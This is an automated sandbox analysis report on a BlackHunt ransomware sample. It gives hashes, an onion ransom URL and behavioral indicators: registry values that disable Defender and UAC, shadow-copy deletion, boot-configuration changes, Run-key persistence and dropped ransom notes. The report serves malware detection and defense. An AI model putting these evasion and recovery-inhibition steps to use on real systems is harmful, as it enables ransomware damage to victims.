Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
165s -
max time network
199s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:18
Static task
static1
Behavioral task
behavioral1
Sample
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
Resource
win10v2004-20231215-en
General
-
Target
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
-
Size
707KB
-
MD5
107d5484b3d34e5560406e214e6c1d0e
-
SHA1
939d1b225cbb7ec7ca8c739d1b6f4f49032e1774
-
SHA256
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a
-
SHA512
8c0e52726bb77a7ca34c1a6bffbfce769c1d40c8154f0d2e51ac9fab76b8e166fba0c431da42114ed9f781742efa2e7786e31f245a47df7e07daff69d8867c2c
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158ivnh:6uaTmkZJ+naie5OTamgEoKxLWcsh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5896 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3396 bcdedit.exe 5772 bcdedit.exe -
Renames multiple (641) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3488 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\G: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\B: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\L: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\Q: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\O: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\H: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\N: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\W: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\Z: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\P: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\S: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\V: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\T: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\U: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\K: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\M: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\R: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\Y: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\J: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\X: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\CheckpointSearch.wm 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\release 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre-1.8\Welcome.html 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\ResizeSubmit.eprtx 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_pt_BR.properties 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\tzmappings 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\javafx.properties 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightItalic.ttf 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\dom.md 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xerces.md 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jre-1.8\bin\plugin2\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cldr.md 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\content-types.properties 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_de.properties 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5260 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5360 vssadmin.exe 5936 vssadmin.exe 6052 vssadmin.exe 2532 vssadmin.exe 220 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ Process not Found Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 Process not Found -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeRestorePrivilege 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeBackupPrivilege 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeTakeOwnershipPrivilege 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeAuditPrivilege 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeSecurityPrivilege 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeIncBasePriorityPrivilege 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeBackupPrivilege 5464 vssvc.exe Token: SeRestorePrivilege 5464 vssvc.exe Token: SeAuditPrivilege 5464 vssvc.exe Token: SeBackupPrivilege 6080 wbengine.exe Token: SeRestorePrivilege 6080 wbengine.exe Token: SeSecurityPrivilege 6080 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1376 wrote to memory of 1860 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 88 PID 1376 wrote to memory of 1860 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 88 PID 1376 wrote to memory of 4016 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 90 PID 1376 wrote to memory of 4016 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 90 PID 1376 wrote to memory of 1928 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 92 PID 1376 wrote to memory of 1928 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 92 PID 1376 wrote to memory of 3692 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 94 PID 1376 wrote to memory of 3692 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 94 PID 1376 wrote to memory of 2364 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 96 PID 1376 wrote to memory of 2364 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 96 PID 2364 wrote to memory of 1788 2364 cmd.exe 100 PID 2364 wrote to memory of 1788 2364 cmd.exe 100 PID 1928 wrote to memory of 2600 1928 cmd.exe 98 PID 1928 wrote to memory of 2600 1928 cmd.exe 98 PID 1860 wrote to memory of 4008 1860 cmd.exe 103 PID 1860 wrote to memory of 4008 1860 cmd.exe 103 PID 3692 wrote to memory of 5016 3692 cmd.exe 101 PID 3692 wrote to memory of 5016 3692 cmd.exe 101 PID 4016 wrote to memory of 1540 4016 cmd.exe 102 PID 4016 wrote to memory of 1540 4016 cmd.exe 102 PID 1376 wrote to memory of 1976 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 105 PID 1376 wrote to memory of 1976 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 105 PID 1376 wrote to memory of 4572 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 107 PID 1376 wrote to memory of 4572 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 107 PID 1376 wrote to memory of 3732 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 111 PID 1376 wrote to memory of 3732 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 111 PID 1376 wrote to memory of 1812 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 110 PID 1376 wrote to memory of 1812 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 110 PID 1376 wrote to memory of 2708 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 112 PID 1376 wrote to memory of 2708 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 112 PID 1376 wrote to memory of 4304 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 114 PID 1376 wrote to memory of 4304 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 114 PID 1376 wrote to memory of 4848 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 117 PID 1376 wrote to memory of 4848 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 117 PID 1376 wrote to memory of 2060 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 118 PID 1376 wrote to memory of 2060 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 118 PID 1376 wrote to memory of 4540 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 120 PID 1376 wrote to memory of 4540 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 120 PID 1376 wrote to memory of 844 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 123 PID 1376 wrote to memory of 844 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 123 PID 1376 wrote to memory of 4444 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 125 PID 1376 wrote to memory of 4444 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 125 PID 1376 wrote to memory of 1388 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 129 PID 1376 wrote to memory of 1388 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 129 PID 1376 wrote to memory of 4684 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 127 PID 1376 wrote to memory of 4684 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 127 PID 1376 wrote to memory of 2036 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 130 PID 1376 wrote to memory of 2036 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 130 PID 1376 wrote to memory of 2352 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 138 PID 1376 wrote to memory of 2352 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 138 PID 1376 wrote to memory of 4200 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 132 PID 1376 wrote to memory of 4200 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 132 PID 1376 wrote to memory of 2416 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 135 PID 1376 wrote to memory of 2416 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 135 PID 1376 wrote to memory of 632 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 134 PID 1376 wrote to memory of 632 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 134 PID 1376 wrote to memory of 1436 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 141 PID 1376 wrote to memory of 1436 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 141 PID 1376 wrote to memory of 5068 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 140 PID 1376 wrote to memory of 5068 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 140 PID 1376 wrote to memory of 1992 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 146 PID 1376 wrote to memory of 1992 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 146 PID 1376 wrote to memory of 588 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 144 PID 1376 wrote to memory of 588 1376 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 144 -
System policy modification 1 TTPs 3 IoCs
